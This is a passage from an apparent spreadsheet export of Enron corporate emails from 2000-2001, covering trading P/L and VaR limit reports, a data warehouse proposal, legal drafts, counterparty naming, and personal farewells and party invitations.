    <t>frozenset({'m..love@enron.com', 'kimat.singla@enron.com', 'victoria.versen@enron.com', 'judy.townsend@enron.com', 'w..pereira@enron.com', 'alejandra.chavez@enron.com', 'brad.mckay@enron.com', 'james.hungerford@enron.com', 'scott.goodell@enron.com', 'darren.espey@enron.com', 'jeff.royed@enron.com', 'scott.neal@enron.com', 'kulvinder.fowler@enron.com', 'craig.taylor@enron.com', 'jonathan.mckay@enron.com', 'luchas.johnson@enron.com', 'f..keavey@enron.com', 'vladi.pimenov@enron.com', 'chris.germany@enron.com', 'chuck.ames@enron.com', 'scott.palmer@enron.com', 'ashley.worthing@enron.com', 'hal.mckinney@enron.com', 'f..brawner@enron.com', 'john.hodge@enron.com', 'melissa.videtto@enron.com'})</t>
  </si>
  <si>
    <t>TRV Notification:  (East P/L Totals - 11/16/2001)</t>
  </si>
  <si>
    <t>The report named: East P/L Totals &lt;http://trv.corp.enron.com/linkFromExcel.asp?report_cd=1&amp;report_name=East+P/L+Totals&amp;category_cd=1&amp;category_name=EAST&amp;toc_hide=1&amp;sTV1=1&amp;TV1Exp=Y&amp;current_efct_date=11/16/2001&gt;, published as of 11/16/2001 is now available for viewing on the website.</t>
  </si>
  <si>
    <t>Sat, 27 Oct 2001 11:49:47 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Stats</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kitchen, Louise  _x000D_
Sent:	Saturday, October 27, 2001 1:15 PM_x000D_
To:	Kitchen, Louise_x000D_
Subject:	Stats_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
West Power Desk_x000D_
Assuming book outs 	2,208MW of 70,000MW (3.15%)_x000D_
No book outs		44,167MW of 70,000MW (63%)  _x000D_
_x000D_
East Power Desk	_x000D_
_x000D_
West:_x000D_
Gross 1,500,000 MWhs_x000D_
If it all goes physical (if people stop taking us), entire western market would be exposed by _x000D_
_x000D_
750,000/24_x000D_
31,250 average megawatts per day_x000D_
or as most of it is on peak_x000D_
650,000/16_x000D_
40,000MWs average on peaks / 70,000MWs entire market_x000D_
100,000/24_x000D_
4,167MWs of off peak_x000D_
_x000D_
Total 44,167MWs out of 70,000MWs total market_x000D_
_x000D_
Assuming book out of 95%_x000D_
2,208MWs out of 70,000MW market.</t>
  </si>
  <si>
    <t>Tue, 12 Sep 2000 01:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mary.solmonson@enron.com'})</t>
  </si>
  <si>
    <t>Trade Warehouse Mtg - Purpose</t>
  </si>
  <si>
    <t xml:space="preserve">fyi_x000D_
---------------------- Forwarded by Mary Solmonson/HOU/ECT on 09/12/2000=20_x000D_
08:47 AM ---------------------------_x000D_
_x000D_
_x000D_
Vanessa Schulte@ENRON_x000D_
09/11/2000 02:52 PM_x000D_
To: Nicki Daw/NA/Enron@Enron_x000D_
cc: Joel Henenberg/NA/Enron@Enron, Mary Solmonson/HOU/ECT@ECT, Scott=20_x000D_
Williamson/HOU/ECT@ECT, Cindy Wisemiller/HOU/ECT@ECT=20_x000D_
Subject: Trade Warehouse Mtg - Purpose_x000D_
_x000D_
Hi Nicki,_x000D_
Thanks for setting up the meeting next Wednesday (9/20) at 2:30 with M.=20_x000D_
Frevert, D. Delainey, J. Shankman, and J. Lavorato.  Here is a brief overvi=_x000D_
ew=20_x000D_
of the meeting objective:_x000D_
_x000D_
Purpose_x000D_
To gain support and approval for a data warehouse vision containing=20_x000D_
consolidated trade information with centralized access._x000D_
_x000D_
Background_x000D_
The definition of a data warehouse is a place to consolidate information=20_x000D_
originating from multiple transaction processing systems and platforms into=_x000D_
 a=20_x000D_
common database repository.  The idea of an Enron =01&amp;Trade Warehouse=018=_x000D_
=20_x000D_
originated from members of the London office and has been expanded to inclu=_x000D_
de=20_x000D_
the Houston systems.  The need for a Trade Warehouse stems from the=20_x000D_
requirement of multiple departments needing to access consolidated deal=20_x000D_
information for analytical reporting and down-stream processing.   Currentl=_x000D_
y,=20_x000D_
deal information is held in separate trading systems both within product=20_x000D_
process flows from mid to back office, and across product lines. The=20_x000D_
information is also stored across multiple system platforms and is not easi=_x000D_
ly=20_x000D_
accessible or consistently presented across the various trading products=20_x000D_
within Enron. Given this current architecture, it is very difficult and=20_x000D_
costly to access timely, quality-assured, and consolidated cross-product de=_x000D_
al=20_x000D_
information for analytical reporting and down-stream processing._x000D_
_x000D_
Proposal_x000D_
Houston will use the warehouse as the data source for EnTelligence and=20_x000D_
numerous analytical reporting application systems.  These analytical=20_x000D_
reporting application systems can include, but are not limited to,=20_x000D_
Operational Pricing Module (OPM), EnronOnline, and Daily Position Report=20_x000D_
(DPR).  Once the warehouse is in place, it may be used as the source for=20_x000D_
additional downstream systems as well as Investor Relations reporting._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 10:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pmetteau@aglresources.com'})</t>
  </si>
  <si>
    <t>Agreement</t>
  </si>
  <si>
    <t>Pat,_x000D_
_x000D_
Attached is a draft of a Master Agreement for your review.  Please give me a _x000D_
call after you have had a chance to review the enclosed._x000D_
_x000D_
_x000D_
_x000D_
Regards,_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Wed, 18 Oct 2000 07:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'8777208398.4891940@pagenetmessage.net'})</t>
  </si>
  <si>
    <t>5.215 by 5.225, I bought 5.235, thought it was going up</t>
  </si>
  <si>
    <t>Tue, 13 Mar 2001 01:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Roundtable</t>
  </si>
  <si>
    <t xml:space="preserve">Here's the thing I'm doing on Thursday._x000D_
_x000D_
Do you have a form of bio for anybody around here?  I need to make something _x000D_
up for the paper._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 03/13/2001 09:44 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Cogan, John" &lt;JCogan@KSLAW.com&gt; on 03/12/2001 05:06:53 PM_x000D_
To: "'C. Kay Mann (E-mail)'" &lt;Kay.Mann@enron.com&gt;_x000D_
cc: "Keffer, John" &lt;JKeffer@KSLAW.com&gt; _x000D_
_x000D_
Subject: RE: Roundtable_x000D_
_x000D_
Dear Kay, I was delighted to hear from John Keffer that, subject to_x000D_
receiving internal approvals, you would be joining us for our Roundtable_x000D_
discussion on Thursday. When you get the necessary approvals could you_x000D_
please send me your bio so that we can make sure you get due credit in The_x000D_
Texas Lawyer? Many thanks, John C._x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From:   Keffer, John _x000D_
&gt; Sent:   Monday, March 12, 2001 4:47 PM_x000D_
&gt; To:   C. Kay Mann (E-mail)_x000D_
&gt; Cc:   Cogan, John; LaFollette, Chris; Coley, Randy_x000D_
&gt; Subject:   Roundtable_x000D_
&gt; _x000D_
&gt; Dear Kay,_x000D_
&gt; _x000D_
&gt; Confirming our discussion, The Texas Lawyer has asked King &amp; Spalding to_x000D_
&gt; organize a Roundtable Discussion of lawyers and business people to discuss_x000D_
&gt; how the two professions relate to each other in the context of complex_x000D_
&gt; business transactions. _x000D_
&gt; _x000D_
&gt; The Roundtable would take place privately in a conference room in our_x000D_
&gt; offices with a court reporter recording the discussion, which would then_x000D_
&gt; be published in an upcoming issue of the newspaper. Participants will have_x000D_
&gt; the opportunity to edit their remarks before they are published. John_x000D_
&gt; Cogan will be co-chairman of the proceedings with our partner, Chris_x000D_
&gt; LaFollette.  I unfortunately cannot attend as I will be out of town. _x000D_
&gt; _x000D_
&gt; The Discussion will take place on Thursday, March 15, from 2 to 3:30. We_x000D_
&gt; will hold a planning session over lunch in one of our conference rooms_x000D_
&gt; from 12:30 to 2. No other preparation would be required._x000D_
&gt; _x000D_
&gt; You would be a terrific representative from Enron to join us and provide_x000D_
&gt; Enron's perspective. Please confirm your attendance as soon as you get the_x000D_
&gt; internal approvals by calling John Cogan at 713.276.7371 or by e-mail at_x000D_
&gt; jcogan@kslaw.com._x000D_
&gt; _x000D_
&gt; Best regards,_x000D_
&gt; John_x000D_
&gt;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t>
  </si>
  <si>
    <t>Tue, 29 May 2001 03:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Sharon</t>
  </si>
  <si>
    <t>I have a note on my calendar that Michael has an appt with SS today.  Has it _x000D_
been cancelled?</t>
  </si>
  <si>
    <t>Fri, 7 Dec 2001 09:11:39 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'george.huan@enron.com'})</t>
  </si>
  <si>
    <t>RE: Good bye! from George Huan</t>
  </si>
  <si>
    <t>Thanks, John.  You still owe me the list of books that you thought I should read._x000D_
_x000D_
George_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Griffith, John  _x000D_
Sent:	Friday, December 07, 2001 11:00 AM_x000D_
To:	Huan, George_x000D_
Subject:	RE: Good bye! from George Huan_x000D_
_x000D_
I will keep in touch.  I have a few contacts in the industry and I will check them out.  It was great knowing you George.  Take care and keep in touch._x000D_
_x000D_
John Griffith_x000D_
_x000D_
(713) 527-8743_x000D_
_x000D_
I don't have email at home but my address is 1503 A Fairview Houston, TX 77006_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huan, George  _x000D_
Sent:	Friday, December 07, 2001 10:52 AM_x000D_
To:	May, Larry; Zipper, Andy; Griffith, John; Maggi, Mike_x000D_
Subject:	Good bye! from George Huan_x000D_
_x000D_
I had a great time working with the best option trading team in the energy industry.  What I have learned from you will benefit me a lot in my future career._x000D_
_x000D_
I will start looking for a new job.  If your friends in other trading house are looking for a junior trader, please let me know._x000D_
_x000D_
Deep in my heart I want to be part of your team.  Count me in when the new company starts hiring people.  _x000D_
_x000D_
Sincerely_x000D_
_x000D_
George Huan_x000D_
_x000D_
Associate, Trading Track, Enron North America _x000D_
(Till 12:00 pm today)_x000D_
_x000D_
My contact info:_x000D_
(713) 682-6005 (H)_x000D_
(281) 451-5062 (O)_x000D_
georgehuan@hotmail.com</t>
  </si>
  <si>
    <t>Thu, 12 Apr 2001 07:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: New CTPY Name - Sierra Pacific Industries</t>
  </si>
  <si>
    <t xml:space="preserve">I'm just going to leave this deal with "New Counterparty" for the time being. _x000D_
I had changed it to Sierra Pacific Industries, Inc., but it sounds like there _x000D_
may be a problem with this name. Please let me know what I can do to help _x000D_
this along, or give me a call when a decision is reached._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Rhonda L Denton_x000D_
04/12/2001 11:48 AM_x000D_
To: Samuel Schott/HOU/ECT@ECT_x000D_
cc: Kate Symes/PDX/ECT@ECT _x000D_
_x000D_
Subject: New CTPY Name - Sierra Pacific Industries_x000D_
_x000D_
Sam, Please contact this CP (info on Kate's previous email) or find the dba _x000D_
information online with D&amp;B or Lexis Nexis so that we can get the true _x000D_
lowdown on this name.  I don't think we should take the trader's information _x000D_
as gospel, for as you know, they are not always accurate.  Please let me know _x000D_
as soon as you get this information.  Thanks._x000D_
---------------------- Forwarded by Rhonda L Denton/HOU/ECT on 04/12/2001 _x000D_
01:45 PM ---------------------------_x000D_
   Kate Symes                04/12/2001 01:26 PM_x000D_
_x000D_
To: Rhonda L Denton/HOU/ECT@ECT, Samuel Schott/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: New CTPY Name - Sierra Pacific Industries_x000D_
_x000D_
Looks like we might have to modify this name in EnPower after all - The dba _x000D_
on our master agreement is "Sierra Pacific Industries" with no "Inc." at the _x000D_
end. I just spoke with Bob Ellery over at Sierra, and he confirmed that, _x000D_
although the company is a corporation, they never use "Inc." in their _x000D_
contracts. Thus, our confirm letters would not match up with the master _x000D_
agreement because of those three pesky letters._x000D_
_x000D_
Just let me know if this causes a problem for either of you. In case you'd _x000D_
like to reference it, the deal number we're attempting to modify is 573679 - _x000D_
it's a buy from Sierra done by Chris Foster on the 10th of April. _x000D_
_x000D_
Thanks again for all your help._x000D_
Kate_x000D_
503-464-7486_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 16:02:14 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rick.buy@enron.com', 'david.port@enron.com'})</t>
  </si>
  <si>
    <t>Commodity Group Limit Issue</t>
  </si>
  <si>
    <t>In addition to the Concentration Limit NA Gas P/L notification issued below, I believe there should also be a P/L Notification on NA Gas Commodity Group Limit, but the DPR reporting does not reflect it currently.  Lavorato has a "Cross-Commodity" line on the Business Unit DPR that reflected $18,670 MM VaR and ($23,583 MM) P/L.  This does not roll up into the NA Gas Commodity Group line which had $55,509 VaR and ($67,838 MM) P/L, both below the $85 MM Commodity Group limit, but it was appropriately included in the Business Unit VaR and P/L.  _x000D_
_x000D_
I obtained the detail of this cross-commodity line by reviewing the Concentration Limit DPR:_x000D_
_x000D_
	VaR	P/L		_x000D_
Gas	  18,580 	  (24,659)	 (a)	_x000D_
Power	       233 	        376 		_x000D_
Residual Fuel		        545 		_x000D_
F/X		        155 		_x000D_
Total		  (23,583)		_x000D_
				_x000D_
Business Unit DPR:				_x000D_
NA Gas	  55,509 	  (67,838)		_x000D_
Gas in Cross-Commodity		  (24,659)	 (a)	_x000D_
Total		  (92,497)		_x000D_
				_x000D_
_x000D_
_x000D_
According to the Policy, all commodities traded within a business unit should have a limit approved by the CRO.  I can see how we might want to allow some leeway in the application of that requirement, but not to the extent of $18.6 MM VaR.  So my recommendation is:_x000D_
_x000D_
1) Require the Gas and Power position in Lavorato's cross-commodity books to be rolled up into Gas and Power Commodity Group results on the Business Unit DPR, and compared to the Commodity Group VaR limits established for Gas and Power.  This would not have caused a VaR violation today as we recently increased the commodity group limit for Gas to $85 MM, only a P/L notification.  And while Power is not material now, it has been in the past, and could easily be again, and Power is a standard Americas commodity group._x000D_
_x000D_
2) Grant an "Other" VaR limit of $X (a small amount) that authorizes Lavorato to trade other commodities. That at least limits this other activity and will require him to discuss with the you if he wants to take an exceptionally large position in a commodity other than Gas and Power._x000D_
_x000D_
I think protecting the integrity of the Commodity Group limits is also important from the perspective that the Business Unit management is not really responsible for the Concentration Limit DPR (Lavorato and Kitchen do not even have access to view it!), and they are not on the distribution list for notifications on those limits. So as far as Lavorato/Kitchen is concerned, as currently reported they had no P/L notifications today as Power made some income so the business unit only lost ($97MM) vs it's $100 MM VaR limit. But the company lost ($119 MM) on gas, as noted in the e-mail below, and proper reporting of all of Lavorato's gas and power positions in comparison to his corresponding Commodity Group limits would have resulted in a Commodity Group P/L notification of ($92 MM) vs. the $85 MM limit._x000D_
_x000D_
We already eliminated all the position limits for Gas and Power.  Although the Concentration Limit DPR is accurately reflecting activity, we should probably make sure the VaR and P/L is being clearly reported on the Business Unit DPR as well, as that is the one that much of management of the company is still focused on._x000D_
_x000D_
Do you agree?   We can discuss when you're back in the office._x000D_
_x000D_
Regards,_x000D_
Cassandra._x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Thibodeaux, Kenneth  _x000D_
Sent:	Wednesday, October 17, 2001 2:53 PM_x000D_
To:	Buy, Rick; Frevert, Mark; Lay, Kenneth; Port, David; Whalley, Greg; Schultz, Cassandra; Murphy, Ted; Hayden, Frank_x000D_
Cc:	Wilson, Shona; Abel, Chris; Allison, John; Wallace, Cassi_x000D_
Subject:	RE: ERV Notification: Violation/Notification Memo 10/16/01_x000D_
_x000D_
The notification is now published to the Executive Reports Viewer website - erv.corp.enron.com,  and is available for viewing._x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Thibodeaux, Kenneth  _x000D_
Sent:	Wednesday, October 17, 2001 10:24 AM_x000D_
To:	Buy, Rick; Frevert, Mark; Lay, Kenneth; Port, David; Whalley, Greg; Schultz, Cassandra; Murphy, Ted; Hayden, Frank_x000D_
Cc:	Wilson, Shona; Abel, Chris; Allison, John; Wallace, Cassi_x000D_
Subject:	RE: ERV Notification: Violation/Notification Memo 10/16/01_x000D_
_x000D_
We are having technical difficulties with the ERV website at this time.  We will send another notification to you as soon as the problem has been resolved and the notification is listed on the website._x000D_
_x000D_
Notification: Concentration Americas Natural Gas Total P&amp;L_x000D_
_x000D_
Limit: $100 million_x000D_
DPR report P&amp;L: $119 million_x000D_
_x000D_
Explanation:  The loss was a result of increased prices on short positions.  Specifically:_x000D_
-Positions: _x000D_
Short positions in U.S. Gas (341 BCF), Canada Power Gas (214 BCF), and Cross Commodity Gas (214 BCF)_x000D_
- Prices:_x000D_
NYMEX prices increased $.21 on news of Solomon Smith Barney's revised Winter 01-02 forecast_x000D_
Cash prices increased $.15-$.30 across all regions of the country</t>
  </si>
  <si>
    <t>Wed, 6 Sep 2000 01:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Revised schedule- Financial mathematics NYC September 11 and 12</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 09/06/2000 _x000D_
08:35 AM ---------------------------_x000D_
_x000D_
_x000D_
"Amy Lamonsoff" &lt;alamonsoff@riskwaters.com&gt; on 09/05/2000 04:41:48 AM_x000D_
To: &lt;vkamins@enron.com&gt;, &lt;pnance@teknecon.com&gt;, &lt;eronn@mail.utexas.edu&gt;, _x000D_
&lt;ds64@cyrus.andrew.cmu.edu&gt;, &lt;sgibner@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Revised schedule- Financial mathematics NYC September 11 and 12_x000D_
_x000D_
_x000D_
_x000D_
Please see attached revised schedule for the NY  training. Please confirm _x000D_
ASAP that this new schedule does not cause any  conflicts with your _x000D_
presentation times. All requests for time slots have been  accommodated but _x000D_
please let me know if you foresee any problems._x000D_
?_x000D_
Regards,_x000D_
Amy_x000D_
 - SPEAKER TIME SLOT CHANGE.doc_x000D_
</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 12:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'deb.korkmas@enron.com', 'harry.collins@enron.com', 'dan.lyons@enron.com', 'carol.clair@enron.com', 'ken.curry@enron.com', 'peter.vecchio@enron.com', 'lou.stoler@enron.com', 'cheryl.lindeman@enron.com'})</t>
  </si>
  <si>
    <t>Letters of Credit; Preference; Swap Transactions</t>
  </si>
  <si>
    <t>Please see the attached.  Julia_x000D_
_x000D_
_x000D_
Julia Heintz Murray_x000D_
Managing Director and General Counsel_x000D_
Enron Wholesale Services_x000D_
Enron Industrial Markets LLC_x000D_
1400 Smith Street, EB3838_x000D_
Houston, TX  77002_x000D_
(713) 853-4794_x000D_
Fax:  (713) 646-3393_x000D_
julia.murray@enron.com_x000D_
_x000D_
----- Forwarded by Julia Murray/HOU/ECT on 05/24/2001 07:38 PM -----_x000D_
_x000D_
	"Ireland, Emory" &lt;eireland@foleylaw.com&gt;_x000D_
	Sent by: "Steiner, Judith A." &lt;JSteiner@foleylaw.com&gt;_x000D_
	05/24/2001 11:36 AM_x000D_
		 _x000D_
		 To: "'julia.murray@enron.com'" &lt;julia.murray@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Letters of Credit; Preference; Swap Transactions_x000D_
_x000D_
_x000D_
 - 1014549_1.DOC</t>
  </si>
  <si>
    <t>Mon, 9 Oct 2000 03:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Invitees for Grant's Party</t>
  </si>
  <si>
    <t xml:space="preserve">Vince:_x000D_
_x000D_
When do you want to try and have Grant's party?_x000D_
_x000D_
Below is a list of people that he would like to invite._x000D_
_x000D_
Shirley_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Shirley Crenshaw/HOU/ECT on 10/09/2000 _x000D_
10:07 AM ---------------------------_x000D_
_x000D_
_x000D_
"Grant Masson" &lt;grantmasson@hotmail.com&gt; on 10/09/2000 10:09:46 AM_x000D_
To: shirley.crenshaw@enron.com_x000D_
cc: Vince.Kaminski@enron.com _x000D_
Subject: Invitees for Grant's Party_x000D_
_x000D_
_x000D_
Shirley:_x000D_
_x000D_
Vince suggested I send you a list of non-research folks whom I would like to_x000D_
invite to the going away party._x000D_
_x000D_
Ted Murphy_x000D_
George Hopley_x000D_
Bernie Aucoin_x000D_
Edith Cross_x000D_
Vlady Gorny_x000D_
Naveen Andrews_x000D_
Debbie Brackett._x000D_
_x000D_
The above are the essentials.  I also like to invite the following, but I_x000D_
recognize that Vince may want to control costs, so I will leave it up to you_x000D_
and him to invite or not._x000D_
_x000D_
Bill Bradford_x000D_
Jim Simpson (structuring, works for Bernie)_x000D_
Rudi Zipter_x000D_
Greg Woulfe (EBS trader, not a Portland marketer!)_x000D_
Scott Tholan_x000D_
Kevin Golden_x000D_
Rebecca ???  (works with Vlady)._x000D_
_x000D_
I will also try to invite Terry Lohrenz unless instructed not to._x000D_
_x000D_
Give me a call at home if you have questions._x000D_
_x000D_
Regards,_x000D_
Gran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t>
  </si>
  <si>
    <t>Mon, 2 Oct 2000 07:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: New recruits - No Poaching</t>
  </si>
  <si>
    <t xml:space="preserve">Clear it with arnold if you want dutch.  Let me know as people come to you.  _x000D_
the goal is to have people rotate into your group directly, or from the gas _x000D_
fundamentals group if possible, and vice versa.  _x000D_
_x000D_
Keep me updated, and you, I and Lavo will work this out.  Jeff_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Jennifer Fraser                           09/25/2000 11:54 AM_x000D_
	_x000D_
_x000D_
To: Jeffrey A Shankman/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: New recruits - No Poaching_x000D_
_x000D_
JS:_x000D_
Several analysts have approached me with the desire to join me in EGM. What _x000D_
are the limitations on this? Also Dutch quigley is interested in coming over _x000D_
as well. He would like to start in research with a view that he would later _x000D_
trade or market something in EGM._x000D_
Thanks_x000D_
Jen_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 09:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Confirms for Nevada Power</t>
  </si>
  <si>
    <t xml:space="preserve">Julie is checking with Kern and the modification to their assignment _x000D_
agreement and whether they will prepare the assignments.  If I am to prepare _x000D_
the assignments I will need the Transportation Service Agreement information _x000D_
(volume, contract #, contract date)  for each shipper._x000D_
_x000D_
_x000D_
_x000D_
	Barry Tycholiz@ENRON_x000D_
	04/09/2001 03:49 PM_x000D_
		_x000D_
		 To: Gerald Nemec/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: Confirms for Nevada Power_x000D_
_x000D_
gerald, pls change the contract price to monthy index minus $ .42 US/mmbtu on _x000D_
both agreements and resend. _x000D_
</t>
  </si>
  <si>
    <t>Wed, 8 Mar 2000 07:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: TCO capacity available</t>
  </si>
  <si>
    <t xml:space="preserve">Scott, CES was short at the following Market Area:_x000D_
Op Mkt_x000D_
8 35_x000D_
7 5 _x000D_
7 4_x000D_
7 3_x000D_
7 1_x000D_
10 30_x000D_
8 27_x000D_
4 25_x000D_
_x000D_
thanks_x000D_
joann_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Scott Goodell_x000D_
03/08/2000 10:56 AM_x000D_
To: Dick Jenkins/HOU/ECT@ECT, Chris Germany/HOU/ECT@ECT, Robin _x000D_
Barbe/HOU/ECT@ECT, Sarah Mulholland/HOU/ECT@ECT, Scott _x000D_
Hendrickson/HOU/ECT@ECT, Robert Allwein/HOU/ECT@ECT, Joann _x000D_
Collins/Corp/Enron@ENRON, Joan Veselack/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: TCO capacity available_x000D_
_x000D_
Attached is a list of Columbia Gas capacity that posted on the EBB.  All bids _x000D_
are due 3/15 at 9am.  _x000D_
Let me know what you see value in and what our game plan is.  If ENA doesn't _x000D_
want it should we mention it to CES?_x000D_
_x000D_
Robert, Joann and Joni - was CES short this winter at any of these points?_x000D_
_x000D_
Scott_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Jun 2000 09:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'wes.colwell@enron.com', 'george.mcclellan@enron.com', 'brian.redmond@enron.com', 'c.thompson@enron.com', 'edward.ondarza@enron.com', 'tim.belden@enron.com', 'janet.dietrich@enron.com', 'sally.beck@enron.com', 'gary.hickerson@enron.com', 'jere.overdyke@enron.com', 'jeff.donahue@enron.com', 'beth.perlman@enron.com', 'mark.frevert@enron.com', 'david.oxley@enron.com', 'mark.haedicke@enron.com', 'mike.jakubik@enron.com', 'james.ajello@enron.com', 'jeffrey.shankman@enron.com', 'raymond.bowen@enron.com', 'rodney.malcolm@enron.com', 'vince.kaminski@enron.com', 'christopher.calger@enron.com', 'john.lavorato@enron.com', 'julia.murray@enron.com', 'max.yzaguirre@enron.com', 'w.duran@enron.com', 'rob.milnthorp@enron.com', 'kevin.presto@enron.com', 'scott.josey@enron.com'})</t>
  </si>
  <si>
    <t>Staff Meeting</t>
  </si>
  <si>
    <t>This is a reminder !!!!!  There will be a Friday Meeting, June 2, 2000._x000D_
_x000D_
    Date:  Friday June 2, 2000_x000D_
_x000D_
    Time:  2:30 pm - 4:30 pm_x000D_
_x000D_
    Location: 30C1_x000D_
 _x000D_
    Topic:   Combined Staff and Budget Meeting_x000D_
_x000D_
      _x000D_
_x000D_
_x000D_
If you have any questions or conflicts, please feel free to call me (3-0643) _x000D_
or Bev (3-7857)._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay 3-0643</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 00:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'david.dupre@enron.com'})</t>
  </si>
  <si>
    <t>Enron Energy Serv Swaps</t>
  </si>
  <si>
    <t xml:space="preserve">Please look these up for me, make copies, and have them delivered to me._x000D_
Thanks_x000D_
David_x000D_
---------------------- Forwarded by David P Dupre/HOU/ECT on 11/14/2000 08:50 _x000D_
AM ---------------------------_x000D_
Stephanie Piwetz   11/13/2000 12:24 PM_x000D_
_x000D_
To: David P Dupre/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Enron Energy Serv Swaps_x000D_
_x000D_
David, _x000D_
_x000D_
Enron Energy Services has requested an executed or non executed copy of the _x000D_
following Swap deals, please let me know if you have any documentation what _x000D_
so ever.   Deals:  253728, 253746, 253756, 253209._x000D_
_x000D_
Thank you_x000D_
Stephanie_x000D_
39210_x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 Oct 2001 11:54:10 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lynn.blair@enron.com', 'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'toby.kuehl@enron.com', 'kimberly.watson@enron.com', 'drew.fossum@enron.com'})</t>
  </si>
  <si>
    <t>RE: TW Index Deals</t>
  </si>
  <si>
    <t xml:space="preserve">I found one note dated 12/8/00 asking Toby Kuehl to post Jan 2001 LFT capacity for one day.   This was the same capacity we sold to Sempra for Dec '00.  I could not find anything else on paper related to our marketing efforts.  I think we'd done it enough times before to where it became almost automatic what the procedure would be._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Fossum, Drew  _x000D_
Sent:	Tuesday, October 16, 2001 11:48 AM_x000D_
To:	Kuehl, Toby; Watson, Kimberly; Lindberg, Lorraine; Lohman, TK; Hyatt, Kevin; Blair, Lynn_x000D_
Cc:	Kilmer III, Robert; Y'Barbo, Paul; Miller, Mary Kay; Harris, Steven; Porter, Gregory J.; Pavlou, Maria; Lindberg, Susan_x000D_
Subject:	TW Index Deals_x000D_
_x000D_
It looks to me from reviewing the bid documents we received on the January I to I deals like we communicated to the counterparties identical information that the capacity would be available in several "packages" and other details of the sale procedure.   That communication must have been either (1) a posting of some type, (2) a fax or other document we sent them explaining what space was available and how to bid, or (3) a script that the marketers were all following to communicate to the customers.   Toby, if it was a posting, it would have gone up in late December or the first few days of January.  Please verify whether we did any open season posting advertising that space (which included Dec. 01 space and calendar '02 and '03 space).  If it was a fax or other document or a script, we need to get our hands on it.  Kevin, Lorraine, TK, Susan--does anyone remember which it was or know how to get our hands on it?  _x000D_
_x000D_
If we are going to be in a dogfight with BP on these deals, lets make sure we go in armed with as much of the relevant information as possible to demonstrate we were following the rules.  DF </t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 03:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jay_liberman@ml.com'})</t>
  </si>
  <si>
    <t>Account</t>
  </si>
  <si>
    <t>Instead of sending $ in and pulling $ out every month, I am going to stop _x000D_
sending $ into the CMA account starting this month.  I actually have already _x000D_
done this on the web.  What I need you to do is to stop the monthly purchase _x000D_
of APGCX for $340 begining this month.  Also, any idea if I am going to _x000D_
receive a 1099 for the recharacterization of the IRAs?  I noticed online _x000D_
that  the Roths are now zero.  Thanks._x000D_
_x000D_
DG</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 07:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'willie.harrell@enron.com', 'kelly.lombardi@enron.com'})</t>
  </si>
  <si>
    <t>Dow Jones Mid-Columbia Index</t>
  </si>
  <si>
    <t>I just entered an index deal for one of our traders, and came across _x000D_
something I hadn't noticed before. In EnPower, we have several choices for _x000D_
